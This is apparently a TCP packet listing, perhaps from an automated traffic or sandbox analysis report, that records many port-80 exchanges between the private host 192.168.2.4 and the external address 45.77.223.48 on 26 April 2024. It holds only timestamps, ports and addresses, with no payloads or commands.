Apr 26, 2024 04:42:31.983438015 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.158945084 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.159106016 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.159183979 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.165828943 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.165865898 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.165930033 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.179433107 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.179527998 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.179601908 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.192848921 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.192948103 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.193026066 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.206275940 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.206298113 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.206377029 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.219978094 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.220072985 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.220156908 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.233560085 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.233629942 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.233710051 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.247328043 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.247406006 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.247474909 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.260891914 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.260963917 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.261039972 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.274081945 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.274111032 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.274173021 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.343439102 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.348573923 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.348647118 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.348706961 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.355278969 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.355400085 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.355459929 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.355501890 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.366600037 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.366777897 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.366832018 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.377733946 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.377856016 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.377914906 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.389107943 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.389172077 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.389242887 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.400739908 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.400815964 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.400876999 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.411952019 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.414989948 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.423316956 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.423444033 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.423455000 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.423487902 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.434736967 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.434820890 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.434886932 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.446295023 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.447458982 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.457277060 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.457331896 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.457370996 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.457427025 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.467986107 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.468029022 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.468080997 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.478499889 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.479453087 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.502966881 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.691375971 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.691488981 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.693378925 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:32.881640911 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:32.881728888 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.071232080 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.827434063 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.827451944 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.827575922 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.827627897 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.827656031 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.827686071 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.835581064 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.835633039 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.835835934 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.835848093 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.835885048 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.835933924 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.835978031 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.836019039 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.836030006 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.836066008 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.836107969 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.836121082 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:33.836155891 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.836199045 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:33.982877970 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:34.016141891 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:34.016204119 CEST	80	49761	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:34.016318083 CEST	49761	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:34.171560049 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:34.171700001 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:34.173942089 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:34.362921953 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:34.363003969 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:34.550918102 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.261075974 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.261209965 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.261240005 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.261291027 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.261364937 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.261364937 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274274111 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274288893 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274300098 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274310112 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274322987 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274343014 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274343014 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274386883 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274430037 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274444103 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.274452925 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274454117 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274482965 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.274540901 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.416599035 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.450536013 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.450589895 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.450599909 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.450637102 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.451026917 CEST	80	49762	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.451102018 CEST	49762	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.604007959 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.604109049 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.607136965 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.794867039 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:35.794982910 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:35.982491970 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.697896957 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.697998047 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.698009968 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.698024988 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.698060036 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.698092937 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705193043 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705250978 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705355883 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705399036 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705552101 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705596924 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705620050 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705661058 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705749989 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705792904 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.705849886 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.705892086 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.706067085 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.706110001 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.848239899 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.884015083 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.884085894 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.884116888 CEST	80	49763	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:36.884229898 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.884231091 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:36.884231091 CEST	49763	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:37.037251949 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:37.037399054 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:37.043735027 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:37.232610941 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:37.232678890 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:37.429143906 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.170217991 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.170311928 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.170361996 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.170370102 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.170413971 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.170454025 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178224087 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178299904 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178570986 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178618908 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178637028 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178683043 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178733110 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178777933 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178906918 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178941965 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.178951025 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.178987980 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.179009914 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.179054976 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.317647934 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.362216949 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.362274885 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.362479925 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.362493992 CEST	80	49764	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.362519979 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.362545013 CEST	49764	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.505738020 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.505841017 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.508836031 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.696305037 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:38.696513891 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:38.883991957 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.559355974 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.559473991 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.559556007 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.559613943 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.559628963 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.559686899 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.572813034 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.572869062 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573214054 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573266029 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573529959 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573584080 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573616982 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573668003 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573712111 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573761940 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573837996 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573889971 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.573941946 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.573993921 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.703783989 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.746351957 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.746546984 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.746603966 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.746629000 CEST	80	49765	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.746665001 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.746710062 CEST	49765	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.891591072 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:39.891942024 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:39.893816948 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:40.391865015 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:40.578372955 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.327425003 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.327626944 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.327804089 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.327816010 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.327876091 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.327877045 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.337239027 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.337291002 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.337577105 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.337625027 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.337651968 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.337704897 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.337783098 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.337831020 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.337949991 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.337994099 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.338071108 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.338115931 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.338155031 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.338198900 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.469786882 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.514214993 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.514302015 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.514303923 CEST	80	49766	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.514624119 CEST	49766	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.658392906 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.658598900 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.660722971 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:41.849710941 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:41.849893093 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.038290977 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.965972900 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.966023922 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.966092110 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.966099024 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.966099024 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.966175079 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.983936071 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.983989954 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.984520912 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.984574080 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.984630108 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.984694004 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.984886885 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.984939098 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.984955072 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.984987020 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.984998941 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.985047102 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:42.985074997 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:42.985122919 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.119698048 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.152883053 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:43.152934074 CEST	80	49767	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:43.152982950 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.153044939 CEST	49767	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.309357882 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:43.309669018 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.312556028 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.501935959 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:43.502001047 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:43.691718102 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.455298901 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.455429077 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.455446005 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.455502033 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.455666065 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.455720901 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.472052097 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.472119093 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475182056 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475236893 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475312948 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475363970 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475519896 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475572109 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475617886 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475673914 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475699902 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475749016 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.475775957 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.475826979 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.606460094 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.643781900 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.643855095 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.643881083 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.643922091 CEST	80	49768	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.643951893 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.643980026 CEST	49768	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.794024944 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.794131041 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.797094107 CEST	49769	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:44.985641956 CEST	80	49769	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:44.985744953 CEST	49769	80	192.168.2.4	45.77.223.48
